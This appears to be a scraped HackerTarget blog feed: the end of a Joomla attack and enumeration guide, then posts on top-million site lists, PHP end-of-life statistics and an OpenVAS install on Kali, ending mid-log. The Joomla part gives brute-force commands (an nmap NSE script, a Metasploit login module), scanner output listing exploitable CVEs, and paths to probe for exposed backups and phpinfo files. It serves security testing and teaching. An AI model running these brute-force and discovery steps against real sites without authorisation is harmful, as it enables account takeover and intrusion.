  • TXT/SPF records might also reveal IP addresses of interest.

TLS / SSL Certificate Searches

TLS / SSL searches against Certificate Transparency datasets may also find real hostnames associated with the site's actual IP address, if they can be matched.

JoomlaVS & Other Tools

Passive Joomla Security Scan

Hacker Target hosts a free and simple to use passive Joomla scan. Discover vulnerabilities, web server details, configuration errors, identify template, and test for directory indexing and others.

The freely available tool performs analysis from a simple page grab. Through examination of the HTML source code, JavaScript, and a few other openly accessible pages, it is possible to gain immediate insights into the state of security on the target site. This applies only passive analysis methods, without any aggressive security scanning.

JoomScan

JoomScan is the OWASP Joomla! Vulnerability Scanner, an open source project written in Perl. It ties together some of these enumeration techniques, such as identifying the Joomla version, known vulnerabilities and the admin login page.

Check out the latest version on GitHub: https://github.com/rezasp/joomscan

Note that this project has not been updated for a number of years.

JoomlaVS

JoomlaVS is an open source Ruby application. It scans for vulnerabilities in components, modules and templates and performs basic fingerprinting. More info is available on the project page at https://github.com/rastating/joomlavs

----------------------------------------------------------------------


[+] URL: http://testexample.com/
[+] Started: Mon Jun 12 11:02:01 2020

[+] Found 1 interesting headers.
 |  Server: Apache

[+] Joomla version 2.5.30 identified from language file (en-GB.xml)
[!] Found 8 vulnerabilities affecting this version of Joomla!

[!] Title: Joomla Akeeba Kickstart Unserialize Remote Code Execution
 |  Reference: https://www.exploit-db.com/exploits/35033
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-7228
[i] Fixed in: 3.3.5


[!] Title: Joomla Media Manager File Upload Vulnerability
 |  Reference: https://www.exploit-db.com/exploits/27610
 |  Reference: http://www.cvedetails.com/cve/CVE-2013-5576
[i] Fixed in: 3.1.5


[!] Title: Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities
 |  Reference: https://www.exploit-db.com/exploits/37473
[i] Fixed in: 3


[!] Title: Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution
 |  Reference: https://www.exploit-db.com/exploits/38977
 |  Reference: http://www.cvedetails.com/cve/CVE-2015-8562
[i] Fixed in: 3.4.6


[!] Title: Remote Code Execution in third-party PHPMailer library
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-10033
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-10045
[i] Fixed in: 3.6.5


[!] Title: Unauthorised Logins
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-6632
[i] Fixed in: 3.3.3


[!] Title: Denial of Service
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-7229
[i] Fixed in: 3.3.4


[!] Title: Joomla! < 3.6.4 Privilege Escalation
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-9838
[i] Fixed in: 3.6.4


[+] Scanning for vulnerable components...
[!] Found 0 vulnerable components.

------------------------------------------------------------------

[+] Scanning for vulnerable modules...
[!] Found 0 vulnerable modules.

------------------------------------------------------------------

[+] Scanning for vulnerable templates...
[!] Found 0 vulnerable templates.

------------------------------------------------------------------

[+] Finished
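The scan output above identifies the Joomla version from the language file and lists a "Fixed in" release for each issue. As an added example (not code from the article or from JoomlaVS), the check below does the same comparison offline: it reads the version from a language metafile and reports which of the listed issues are unfixed for that version. The XML layout is a constructed sample modelled on Joomla's language metafile format, and the issue table is taken from the scan output above.

```python
"""Added example: Joomla version from a language metafile vs. the "Fixed in" list above."""
import re
import xml.etree.ElementTree as ET

# Constructed sample of a Joomla language metafile (layout assumed from Joomla's
# language XML format; the 2.5.30 value matches the install shown in the scan output).
SAMPLE_EN_GB_XML = """<?xml version="1.0" encoding="utf-8"?>
<metafile version="2.5" client="site">
    <name>English (United Kingdom)</name>
    <version>2.5.30</version>
    <creationDate>2014-07-31</creationDate>
    <author>Joomla! Project</author>
</metafile>
"""

# Issue title -> first release that fixes it, copied from the JoomlaVS output above.
FIXED_IN = {
    "Akeeba Kickstart Unserialize RCE (CVE-2014-7228)": "3.3.5",
    "Media Manager File Upload (CVE-2013-5576)": "3.1.5",
    "Language Switcher Module XSS": "3",
    "Object Injection RCE (CVE-2015-8562)": "3.4.6",
    "PHPMailer RCE (CVE-2016-10033, CVE-2016-10045)": "3.6.5",
    "Unauthorised Logins (CVE-2014-6632)": "3.3.3",
    "Denial of Service (CVE-2014-7229)": "3.3.4",
    "Privilege Escalation (CVE-2016-9838)": "3.6.4",
}


def parse_version(text):
    """Turn '3.4.6' or '3' into a tuple of ints so versions compare numerically."""
    return tuple(int(p) for p in re.findall(r"\d+", text))


def version_from_metafile(xml_text):
    """Extract the <version> element of a Joomla language metafile."""
    root = ET.fromstring(xml_text)
    node = root.find("version")
    if node is None or not node.text:
        raise ValueError("no <version> element in metafile")
    return node.text.strip()


def unfixed_issues(installed, fixed_in=FIXED_IN):
    """Return the issue titles whose fixing release is newer than the installed version.

    This is the same simple ordering JoomlaVS applies: an installed version below the
    "Fixed in" release is reported. A 2.5.x LTS install that received backported fixes
    would need manual confirmation, since plain version ordering cannot see backports.
    """
    inst = parse_version(installed)
    return sorted(
        title for title, fixed in fixed_in.items() if inst < parse_version(fixed)
    )


if __name__ == "__main__":
    ver = version_from_metafile(SAMPLE_EN_GB_XML)
    print(f"Joomla version {ver} identified from language file")
    for title in unfixed_issues(ver):
        print(f"[!] {title} (fixed in {FIXED_IN[title]})")
```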

CMSMap

As the name implies, CMSMap covers the most popular CMSs. An open source project written in Python, this tool has support for Joomla, WordPress and Drupal, and is useful for automating a scan for low-hanging fruit.

Download the latest version of CMSMap from GitHub:

git clone https://github.com/Dionach/CMSmap 

Attacking and Exploitation

Brute Force Joomla logins

The 2013 Joomla 3.2 stable release brought 2FA as part of the core install, which adds another challenge to brute-forcing an account. However, it isn't enabled by default.

Popping Weak Passwords

Detecting weak passwords for Joomla comes in a variety of ways. There are many ways to brute force a login page; here are a few.


Nmap NSE Scripts for Joomla

Nmap is best known for network discovery; however, NSE scripts extend the functionality of the popular Nmap port scanner. An Nmap NSE script is particularly helpful for performing a brute-force password attack against a Joomla install.

    $ nmap -p80 --script http-joomla-brute example-site

Burpsuite

If there is a login form on the site or you have found the administrator interface, then Burp Suite can be used to try to brute force the password.

There are other tools around such as JoomBrute, and others such as Hydra and Ncrack, though the latter two are most suited for other protocols.

Metasploit

Rapid7's Metasploit provides a few modules for brute forcing CMS logins, including Joomla, across various Joomla versions. One is the Joomla Bruteforce login utility:

msf > use auxiliary/scanner/http/joomla_bruteforce_login

Exploit Joomla Extensions

One of the most common reasons for Joomla sites being compromised is vulnerable extensions, modules & plugins. These all contain a large amount of PHP code and come from developers with differing levels of skill, ability and focus when it comes to writing secure software.

Keeping the Joomla extensions, core and templates updated and/or patched needs to be a routine task for the Joomla administrator of the site.


1,437 published exploits for Joomla and its components.

Joomla Security announcements and Vulnerable extensions list

The Joomla Developer Network has a Security Announcements page which provides a feed of recently resolved security issues in Joomla software releases.

As part of the Joomla extension directory, Joomla maintains a list of Vulnerable extensions.

Exploit Example

An issue was discovered in the Creative Contact Form extension (2019). A directory traversal vulnerability resides in the filename field for uploaded attachments. An attacker could exploit this vulnerability with the "Send me a copy" option to receive any files of the filesystem via email.

Exploit References:
https://packetstormsecurity.com/files/156655/Creative-Contact-Form-4.6.2-Directory-Traversal.html
https://nvd.nist.gov/vuln/detail/CVE-2020-9364#VulnChangeHistorySection

Exploit Joomla Template

While vulnerabilities in templates are not as common as in extensions, it is still worth checking the template in use. Check the developer's page for security related updates, and if it is a custom template, running standard web application testing may discover unpublished vulnerabilities.

In this example of an XSS vulnerability, we see that even the Joomla core default template had a vulnerability as recently as 2019.

Exploit References:
https://developer.joomla.org/security-centre/791-20190901-core-xss-in-logo-parameter-of-default-templates.html

Exploiting Joomla Core

Vulnerabilities in Joomla core are highly valued by an attacker as they do not depend on a particular extension being installed.

In 2016, two critical vulnerabilities allowed privilege escalation by remote users. Attackers were first able to create accounts even if account registration was disabled, and second, to increase their privileges on any Joomla site running versions 3.4.4 to 3.6.3. Attackers could then upload a backdoor and ultimately control the site.

The solution was to upgrade to version 3.6.4. Joomla devs released limited information on the vulnerabilities; however, it was enough for groups to figure things out and develop exploits. Exploits in the wild were spotted, including some that automatically uploaded backdoors to vulnerable sites.

Exploit References:
CVE-2016-8870
CVE-2016-8869
Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation

Sniff and Capture Credentials over non-secure login

HTTP over TLS should be enabled on any public website in 2020. If only HTTP is used, passwords, logins and session cookies are all sent over the network in the clear. Clear text sessions could be monitored on your local network, on your Internet provider's network or anywhere between the client and server.

With easy access to free certificates there is really no reason not to be using HTTPS. Check your TLS configuration with tools such as sslyze.

Vulnerable Server Software

Exploitation of the Joomla site could come from other server components; it is not always the Joomla web application that will be the exploitation vector. A simple misconfiguration of a network service or a failure to apply server updates could lead to compromise of the server and all hosted applications.

With the results of an Nmap scan, an attacker will review open services for known vulnerabilities. A small sample of these network services includes FTP, SSH, MySQL & Redis - any of these could lead to server compromise if vulnerable or poorly configured.

Compromise Systems Administration Tools

Related to the previous section, here we are identifying server applications that may lead to compromise of the Joomla site.

An example of this type of tool is phpMyAdmin running on the web server. A weak database password or a vulnerable version of phpMyAdmin could lead to compromise of the database and possibly even code execution.

Discovery of the phpMyAdmin installation would usually involve a content discovery scan whose wordlist includes common paths for phpMyAdmin.

Content Discovery

Sensitive information, database credentials and backups are just a few of the items that can be found with content discovery. Content discovery attempts to find any interesting items contained within a web path of an application. There are a variety of tools out there catering for this purpose; choose the one or ones that suit your needs. A few example tools are DIRB, DirBuster, dirsearch and gobuster.

Common locations to check are:

    /robots.txt
    /backup
    /images/
    /bin/
    /uploads/
    /components/
    /administrator/
    /.htaccess.txt
    /index.html
    /index.php
    /templates/exampletemplate
    /administrator/templates/exampletemplate
    /phpmyadmin/
    /phpinfo.php

Found Backups

Using content discovery, a commonly found vulnerability is a site backup. This results from a mistake during system administration where a backup of the folder was taken and left in the publicly accessible web root (e.g. /backup.tar.gz).

With a backup an attacker has access to all files of the installation including all installed components as well as the configuration file containing the database location and password.

PHP info

Another commonly found item during content discovery is a file calling the PHP function phpinfo(). Site administrators will often create a file in the root of the site such as /phpinfo.php; the function in this file tells the administrator what modules, PHP version and many other server configuration details are available on the web server. This information is also valuable to an attacker if the file is forgotten and left on the server.


The post Attacking and Enumerating Joomla appeared first on HackerTarget.com.

Download Top 1 Million Sites https://hackertarget.com/top-million-site-list-download/ Mon, 20 Jul 2020 01:11:03 +0000 https://hackertarget.com/?p=15089

Data sets of the top 1 million Internet sites are simply compiled lists of web sites (or domains) that are found to have the most traffic. What follows are some of the most popular and well known data sets of the Top 1 Million Sites.

Depending on the methodology used, the results can have significant variability. However, having a reasonably accurate list is beneficial to the many use cases these lists can be applied to.

Alexa Top 1 Million

https://www.alexa.com/topsites

Established way back in 1996, Alexa had a popular toolbar add-on for web browsers. Using the data collected by the toolbar, Alexa developed a top sites list and made it available via a web application.

The Alexa list, while primarily aimed towards marketers, was used for many research projects. It was reasonably accurate, easily accessible, and became the most well-known resource.

Alexa also offered a Top 1 Million list in CSV format that could be downloaded for free. This was an excellent resource and it found many use cases.

Now owned by Amazon, Alexa has recently restricted access to the top 1 million list to paying customers. For a time, there was a list available at http://s3.amazonaws.com/alexa-static/top-1m.csv.zip; however, this appears to be no longer updated and incomplete.

Cisco Umbrella

http://s3-us-west-1.amazonaws.com/umbrella-static/index.html


The Cisco Umbrella list is quite different. Still based around the top 1 million most popular sites, the list is put together from Cisco's visibility into DNS traffic. Rather than being primarily about which sites are most browsed to, it captures the most popular host names being resolved in DNS.

As it is based around popular DNS requests, there are domains in the list that are not in the Alexa list, such as subdomains of primary sites that host other web resources (JS / CSS / images) and even tracking domains used by analytics packages.

The use cases for this list tend towards security and network monitoring. The security use case is not surprising given that Cisco maintains and compiles the list.

"Although the data source is quite different from Alexa’s, we believe it’s arguably more accurate as it’s not based on only HTTP requests from users with browser additions. The way the ranking is computed is not as simple as the net sum of all DNS queries." -- Cisco Umbrella

Majestic Million

https://majestic.com/reports/majestic-million

Majestic publishes a list daily that is compiled after analysis of web crawls. Sites are ranked based on backlinks, a methodology similar to that used by search engines.

Majestic's primary use case is marketing and SEO.

Quantcast

https://www.quantcast.com/

Aimed at marketers, the data is based on traffic from "Internet Service Providers and Toolbar Providers". For this reason, the data is only for US based traffic, and updates are provided monthly.

In the past, this was a free resource, but it now requires an account.

Tranco-List.eu

https://tranco-list.eu/

A recently minted list that is free to download, Tranco uses a methodology that combines some of the other top 1 million site lists mentioned above. By combining lists, the authors believe they have a more accurate list and have even written a paper to explain it.

Created by the team over at ripe.net, who also published an interesting article comparing Alexa, Cisco Umbrella, Majestic & Quantcast.

As shown clearly in this graphic there is very little similarity between the different lists.
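One way to measure that (dis)similarity yourself is to load two lists and compute their overlap. The code below is an added example, not from the article or from any of the list providers; it assumes the "rank,domain" CSV layout the Alexa and Umbrella downloads use, and the sample rows are constructed. The subdomain-collapsing option addresses the point above that a DNS-derived list contains CDN and tracking host names that a browsing-derived list does not.

```python
"""Added example: overlap between two 'rank,domain' top-site lists."""
import csv
import io

# Constructed sample lists in the rank,domain layout (illustrative domains only).
ALEXA_SAMPLE = """1,example.com
2,example.org
3,example.net
4,example.edu
5,example.info
"""
UMBRELLA_SAMPLE = """1,example.com
2,cdn.example.com
3,static.example.org
4,example.net
5,tracker.example-analytics.invalid
"""


def load_ranked_list(text):
    """Parse 'rank,domain' rows into {domain: rank}; malformed or blank rows are skipped."""
    ranks = {}
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 2 or not row[0].strip().isdigit():
            continue
        ranks[row[1].strip().lower()] = int(row[0])
    return ranks


def registrable_part(hostname, labels=2):
    """Crude approximation of the registrable domain (last two labels).

    Assumption for this example: no public-suffix list is consulted, so names under
    suffixes such as co.uk would be collapsed too aggressively.
    """
    return ".".join(hostname.split(".")[-labels:])


def compare_lists(first, second, top_n=None, collapse_subdomains=False):
    """Return common / unique domains and the Jaccard index for the top_n entries.

    collapse_subdomains=True folds cdn.example.com into example.com, which makes a
    DNS-based list (Umbrella) comparable with a browsing-based list (Alexa).
    """

    def selected(ranks):
        names = {d for d, r in ranks.items() if top_n is None or r <= top_n}
        if collapse_subdomains:
            names = {registrable_part(d) for d in names}
        return names

    a, b = selected(first), selected(second)
    common, union = a & b, a | b
    return {
        "common": sorted(common),
        "only_in_first": sorted(a - b),
        "only_in_second": sorted(b - a),
        "jaccard": len(common) / len(union) if union else 0.0,
    }


if __name__ == "__main__":
    alexa = load_ranked_list(ALEXA_SAMPLE)
    umbrella = load_ranked_list(UMBRELLA_SAMPLE)
    for collapse in (False, True):
        result = compare_lists(alexa, umbrella, collapse_subdomains=collapse)
        print(f"collapse_subdomains={collapse}: jaccard={result['jaccard']:.2f}, "
              f"common={result['common']}")
```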

Similar Web

https://www.similarweb.com/top-websites/

Another marketing focused site that offers data. Only the top 50 sites are available from the site unless you upgrade to a paid plan.

Moz

https://moz.com/top-500/download/?table=top500Domains

Moz is a search engine optimization (SEO) service with a large data set of search related data. Using this, Moz makes the top 500 sites available for free.

Netcraft

https://trends.netcraft.com/topsites

Established in 1995, Netcraft is another company that has been around since the early days of the Internet. Internet data analysis and security describe the core functions of Netcraft. They have extensive data on web hosting across the Internet going back to 1995.

Some of the work performed by Netcraft results in the takedown of phishing sites and other cybercrime-related measures.

DomCop

https://www.domcop.com/

Using data from CommonCrawl and CommonSearch, the DomCop project has compiled a list of the top 10 million sites. Better yet, the full site list is available for free download.

CommonCrawl

https://www.commoncrawl.org/

While not an easily downloadable list, it is a resource of websites that can be downloaded for free. This excellent project builds an archive (snapshot) of the web every 2 months. All the page metadata along with HTML, HTTP headers and other information is stored in an archive on Amazon S3. Completely free to download, it is a massive resource: the latest full archive came in at 53TB compressed! Have fun!

The post Download Top 1 Million Sites appeared first on HackerTarget.com.

PHP End of Life (a reminder) https://hackertarget.com/php-end-of-life/ Thu, 18 Jul 2019 03:19:07 +0000 https://hackertarget.com/?p=13788

As of December 2018, PHP 5 and 7.0 became End of Life. It is now July 2019 and up to 74% of PHP powered sites in the top 1 million are running software that is End of Life. This means there is no support and, more importantly, if new vulnerabilities are discovered there will be no security fixes released.

Upgrades do take work and major updates can take even more. People are busy and the reluctance to patch when things are just working is understandable. However, when things go End of Life, there are no more valid reasons not to upgrade. In fact, with the latest releases of PHP there are a number of benefits to upgrading, including a significant increase in site speed.

Warning: for those planning to upgrade, as this is a major version change from 5 to 7, a number of functions were deprecated. Ensure thorough testing is performed so the upgrade process is a smooth one.

PHP End of Life Stats

Methodology

During July we performed a semi-regular analysis of WordPress usage in the top 1 million sites. The methodology for this process is to download the default page from each of the top 1 million sites and analyse the HTTP headers and HTML source of the resulting pages.

The following data is based on sites that reveal the PHP version in the HTTP headers.

The number of sites running unsupported PHP is staggering. Especially considering these are among the highest traffic sites in the world. If a serious security vulnerability were to be discovered in PHP core or a module, these sites would have no way to patch and get protected.

Just show me the Stats!

The number of sites that leak the PHP version in the headers is just over 20% of the Top 1 Million sites.

We found 208806 sites leaking the PHP version; of these, 154645 are running a version other than PHP/7.1, PHP/7.2 or PHP/7.3.

This is where we get the figure of 74% of sites running PHP that is currently End of Life (unsupported).

PHP versions and WordPress

WordPress will require a minimum PHP version of 7 by the end of the year. This matters because WordPress runs close to 30% of all websites accounting for a large percentage of PHP powered sites.

According to statistics from wordpress.org, 37.1% are running End of Life PHP. There is, however, no detail as to how the version was determined.

Another popular content management system, Drupal, recommends a minimum PHP version of 7.1.

Important Caveat

Newer versions of PHP do hide the version by default through the expose_php = Off directive in the php.ini file, so in the overall PHP statistics we would expect the percentage to be better than the 74% shown in the data we have.

Distributions such as Red Hat, Ubuntu and Debian can provide security patching to packaged PHP even if the version is no longer supported by the official PHP project. An example of this is the ongoing support provided as part of the Ubuntu LTS (long term support) releases. Distribution packaged PHP reveals the distribution in the X-Powered-By and Server: headers.

Examples:
X-Powered-By: PHP/5.6.30-0+deb8u1
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.5.38
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.6.40 

Checking for these Linux distributions shows 25532 sites are using the distribution's packaging (this does not verify that all of these are supported, but some would be). In the chart below you can see the versions, with a number using a distribution package for the PHP software.
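The classification used for the statistics above can be reproduced from the headers alone. The code below is an added example (not the survey tooling from the article): it extracts the PHP version from X-Powered-By or Server headers like the examples above, marks branches other than 7.1, 7.2 and 7.3 as End of Life upstream, and flags builds that carry a distribution marker and may therefore still receive backported fixes. The sample headers are constructed, modelled on the examples above.

```python
"""Added example: classify exposed PHP versions and distribution-packaged builds."""
import re

# Constructed sample headers, modelled on the examples in the article.
SAMPLE_HEADERS = [
    "X-Powered-By: PHP/5.6.30-0+deb8u1",
    "Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.5.38",
    "X-Powered-By: PHP/5.5.9-1ubuntu4.29",
    "Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.6.40",
    "X-Powered-By: PHP/7.2.19",
    "Server: nginx",
]

# Branches still supported by the PHP project at the time of the article (July 2019).
SUPPORTED_BRANCHES = {"7.1", "7.2", "7.3"}

# Markers that identify a vendor-packaged build (Debian revision suffix, Ubuntu
# revision suffix, or the distribution named in the Server header).
DISTRO_MARKERS = (
    (re.compile(r"deb\d+u\d+"), "debian"),
    (re.compile(r"ubuntu"), "ubuntu"),
    (re.compile(r"Red Hat Enterprise Linux"), "rhel"),
    (re.compile(r"CentOS"), "centos"),
)

# PHP/<major.minor[.patch]> followed by any packaging suffix such as -0+deb8u1.
PHP_VERSION_RE = re.compile(r"PHP/(\d+\.\d+(?:\.\d+)?)(\S*)")


def classify_header(header):
    """Return None when no PHP version is exposed, otherwise version, branch,
    whether the branch is still supported upstream, and any distribution marker."""
    match = PHP_VERSION_RE.search(header)
    if not match:
        return None
    version = match.group(1)
    branch = ".".join(version.split(".")[:2])
    distro = next((name for rx, name in DISTRO_MARKERS if rx.search(header)), None)
    return {
        "version": version,
        "branch": branch,
        "supported_upstream": branch in SUPPORTED_BRANCHES,
        "distro": distro,
    }


def summarise(headers):
    """Aggregate in the shape the article reports: sites leaking a version,
    sites on an End of Life branch, and sites on a distribution package."""
    leaking = eol = packaged = 0
    for header in headers:
        info = classify_header(header)
        if info is None:
            continue
        leaking += 1
        if not info["supported_upstream"]:
            eol += 1
        if info["distro"]:
            packaged += 1
    return {
        "leaking": leaking,
        "eol": eol,
        "packaged": packaged,
        "eol_pct": round(100 * eol / leaking, 1) if leaking else 0.0,
    }


if __name__ == "__main__":
    for line in SAMPLE_HEADERS:
        print(line, "->", classify_header(line))
    print(summarise(SAMPLE_HEADERS))
```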

PHP Vulnerabilities

At the time of the article there are 599 PHP vulnerabilities with CVEs. The chart below shows the number of PHP vulnerabilities discovered with a CVE score of 6 or higher, by month.

As can be seen over the years there has been a steady stream of vulnerabilities discovered. Of course this is the case in any popular and complex piece of software, whether it is commercial or open source software. This is here as simply another reminder that it is time to upgrade your PHP to a current release.

Comparing Microsoft IIS End of Life

For a quick comparison against a very different software environment, we examined Microsoft IIS server versions. The IIS web server version aligns closely with the Windows Server releases, as can be seen in the table below.

The statistics are based on Microsoft IIS versions found in our survey of the Alexa top 1 million sites.

Total Microsoft-IIS Powered Sites: 67787 (6.8% of top 1M)

Microsoft IIS 7.5 or earlier versions account for 30.3% of sites.

IIS Version   # of sites   Windows Version
IIS/4.0                6   Windows NT 4.0 with Option Pack (End of Life)
IIS/5.0              516   Windows 2000 (End of Life)
IIS/5.1                3   Windows XP Professional (End of Life)
IIS/6.0             2049   Windows Server 2003 and XP (End of Life)
IIS/7.0             1761   Windows Server 2008 (End of Life)
IIS/7.5            16176   Windows Server 2008 R2 (End of Life) *
IIS/8.0             4385   Windows Server 2012
IIS/8.5            27616   Windows Server 2012 R2
IIS/10.0           15191   Windows Server 2016 & 2019

* IIS/7.5 is covered by Extended Security Updates until January 14 2020. Extended Security Updates (ESU) are available for the Datacenter, Standard, and Embedded editions of this product, for up to an additional three years past the end of support.

Conclusion

Even if we take into account the caveats and accept that the number would be lower than 74% across all PHP based sites, it is clear that a significant number of sites do need to upgrade. Site administrators need to get to work and fix this issue now. A new vulnerability could appear any day, and if you are not running a supported version then that will be a bad day.

Knowing your vulnerability exposure and what services are listening on your network is the first step in keeping your organisation secure. Our service simplifies that first step with hosted online vulnerability scanners. Try it out today. Immediate access is available with a full refund available within 7 days.


The post PHP End of Life (a reminder) appeared first on HackerTarget.com.

Install OpenVAS (GVM) on Kali 2019 https://hackertarget.com/install-openvas-gvm-on-kali/ Thu, 14 Mar 2019 03:31:47 +0000 https://hackertarget.com/?p=13358

In this setup guide, we step through the process of getting OpenVAS (GVM) running on Kali 2019. Installing OpenVAS into a Kali-based system is made much easier by the inclusion of a quick setup script.

When using Kali Linux for OpenVAS scanning, resource usage should always be taken into account. Whether running Kali in a virtual machine or on bare metal, you will want to have sufficient memory and CPU available for the scanner to be optimised for speed (4 cores & 8GB should be a minimum). If you are hoping to run large numbers of parallel scans, then you will need more resources. Several performance tuning options are available in the OpenVAS scanner configuration file to better use the resources you have available. See our OpenVAS tutorial for details on modifying the configuration file.

Install

The first step is to install the packages with apt install openvas.

root@kali:~# apt update
root@kali:~# apt upgrade
root@kali:~# apt install openvas

Config

It is then a simple matter of running the configuration script to get OpenVAS configured with required services, user accounts and the latest NVT updates from the Greenbone Community Feed.

root@kali:~# openvas-setup

The output shown here is a bit daunting; however, it is all automated. Assuming all goes well you should soon have a working and up to date OpenVAS installation. The actual time taken for this script will vary depending on download speeds, as it is grabbing a fair amount of data for the signatures and CVE data.

[>] Updating OpenVAS feeds
[*] [1/3] Updating: NVT
--2019-03-13 19:08:49--  http://dl.greenbone.net/community-nvt-feed-current.tar.bz2
Resolving dl.greenbone.net (dl.greenbone.net)... 89.146.224.58, 2a01:130:2000:127::d1
Connecting to dl.greenbone.net (dl.greenbone.net)|89.146.224.58|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23071344 (22M) [application/octet-stream]
Saving to: ‘/tmp/greenbone-nvt-sync.FNJU7dvf1u/openvas-feed-2019-03-13-126973.tar.bz2’

/tmp/greenbone-nvt-sync.FNJU7dvf1u/o 100%[=============================================>]  22.00M  2.76MB/s    in 9.5s    

2019-03-13 19:09:00 (2.32 MB/s) - ‘/tmp/greenbone-nvt-sync.FNJU7dvf1u/openvas-feed-2019-03-13-126973.tar.bz2’ saved [23071344/23071344]

2008/
2008/secpod_ms08-054_900045.nasl
2008/secpod_goodtech_ssh_sftp_mul_bof_vuln_900166.nasl
2008/secpod_pi3web_isapi_request_dos_vuln_900402.nasl
2008/secpod_rhinosoft_serv-u_sftp_dos_vuln_900113.nasl
2008/secpod_ms08-068_900057.nasl
2008/gb_opera_file_heap_bof_vuln_win.nasl

....

[*] [2/3] Updating: Scap Data
Greenbone community feed server - http://feed.community.greenbone.net/
This service is hosted by Greenbone Networks - http://www.greenbone.net/

All transactions are logged.

If you have any questions, please use the Greenbone community portal. 
See https://community.greenbone.net for details.

By using this service you agree to our terms and conditions.

Only one sync per time, otherwise the source ip will be temporarely blocked.

receiving incremental file list
./
COPYING
      1,719 100%    1.64MB/s    0:00:00 (xfr#1, to-chk=41/43)
nvdcve-2.0-2002.xml
 19,661,072 100%  396.63kB/s    0:00:48 (xfr#2, to-chk=40/43)
nvdcve-2.0-2003.xml
  5,740,888 100%  372.54kB/s    0:00:15 (xfr#3, to-chk=39/43)


....


     10,014 100%   10.57kB/s    0:00:00 (xfr#31, to-chk=2/43)
oval/5.10/org.mitre.oval/v/family/unix.xml
 31,372,831 100%  395.91kB/s    0:01:17 (xfr#32, to-chk=1/43)
oval/5.10/org.mitre.oval/v/family/windows.xml
 51,773,463 100%  396.37kB/s    0:02:07 (xfr#33, to-chk=0/43)

sent 3,061 bytes  received 1,206,268,870 bytes  408,559.50 bytes/sec
total size is 1,205,972,114  speedup is 1.00
/usr/sbin/openvasmd
[*] [3/3] Updating: Cert Data
Greenbone community feed server - http://feed.community.greenbone.net/
This service is hosted by Greenbone Networks - http://www.greenbone.net/

All transactions are logged.

If you have any questions, please use the Greenbone community portal. 
See https://community.greenbone.net for details.

By using this service you agree to our terms and conditions.

Only one sync per time, otherwise the source ip will be temporarely blocked.

receiving incremental file list
./
CB-K13.xml
  1,448,830 100%  387.74kB/s    0:00:03 (xfr#1, to-chk=23/25)
CB-K14.xml
  4,787,657 100%  399.75kB/s    0:00:11 (xfr#2, to-chk=22/25)

...

sha256sums.asc
        819 100%    1.02kB/s    0:00:00 (xfr#23, to-chk=1/25)
timestamp
         13 100%    0.02kB/s    0:00:00 (xfr#24, to-chk=0/25)

sent 614 bytes  received 57,604,789 bytes  390,545.11 bytes/sec
total size is 57,589,138  speedup is 1.00
/usr/sbin/openvasmd

[>] Stopping OpenVAS services
● greenbone-security-assistant.service - Greenbone Security Assistant
   Loaded: loaded (/lib/systemd/system/greenbone-security-assistant.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
     Docs: man:gsad(8)
           http://www.openvas.org/

● openvas-scanner.service - Open Vulnerability Assessment System Scanner Daemon
   Loaded: loaded (/lib/systemd/system/openvas-scanner.service; disabled; vendor preset: disabled)
   Active: failed (Result: signal) since Wed 2019-03-13 20:07:12 EDT; 39ms ago
     Docs: man:openvassd(8)
           http://www.openvas.org/
 Main PID: 124044 (code=killed, signal=KILL)

Mar 13 18:53:12 kali systemd[1]: Starting Open Vulnerability Assessment System Scanner Daemon...
Mar 13 18:53:12 kali systemd[1]: Started Open Vulnerability Assessment System Scanner Daemon.
Mar 13 20:07:09 kali systemd[1]: Stopping Open Vulnerability Assessment System Scanner Daemon...
Mar 13 20:07:12 kali systemd[1]: openvas-scanner.service: Main process exited, code=killed, status=9/KILL
Mar 13 20:07:12 kali systemd[1]: openvas-scanner.service: Failed with result 'signal'.
Mar 13 20:07:12 kali systemd[1]: Stopped Open Vulnerability Assessment System Scanner Daemon.

● openvas-manager.service - Open Vulnerability Assessment System Manager Daemon
   Loaded: loaded (/lib/systemd/system/openvas-manager.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
     Docs: man:openvasmd(8)
           http://www.openvas.org/

Mar 13 20:07:09 kali systemd[1]: openvas-manager.service: Main process exited, code=killed, status=15/TERM
Mar 13 20:07:09 kali systemd[1]: openvas-manager.service: Killing process 123944 (gpg-agent) with signal SIGKILL.
Mar 13 20:07:09 kali systemd[1]: openvas-manager.service: Succeeded.
Mar 13 20:07:09 kali systemd[1]: Stopped Open Vulnerability Assessment System Manager Daemon.

[>] Starting openvassd
[>] Migrating openvassd
[>] Rebuilding openvassd
[>] Stopping openvassd

[*] Please wait for the OpenVAS services to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI (Greenbone Security Assistant): https://127.0.0.1:9392

● greenbone-security-assistant.service - Greenbone Security Assistant
   Loaded: loaded (/lib/systemd/system/greenbone-security-assistant.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2019-03-13 20:10:10 EDT; 5s ago
     Docs: man:gsad(8)
           http://www.openvas.org/
 Main PID: 128106 (gsad)
    Tasks: 4 (limit: 14486)
   Memory: 3.3M
   CGroup: /system.slice/greenbone-security-assistant.service
           ├─128106 /usr/sbin/gsad --foreground --listen=127.0.0.1 --port=9392 --mlisten=127.0.0.1 --mport=9390
           └─128112 /usr/sbin/gsad --foreground --listen=127.0.0.1 --port=9392 --mlisten=127.0.0.1 --mport=9390

Mar 13 20:10:10 kali systemd[1]: Started Greenbone Security Assistant.

● openvas-scanner.service - Open Vulnerability Assessment System Scanner Daemon
   Loaded: loaded (/lib/systemd/system/openvas-scanner.service; disabled; vendor preset: disabled)
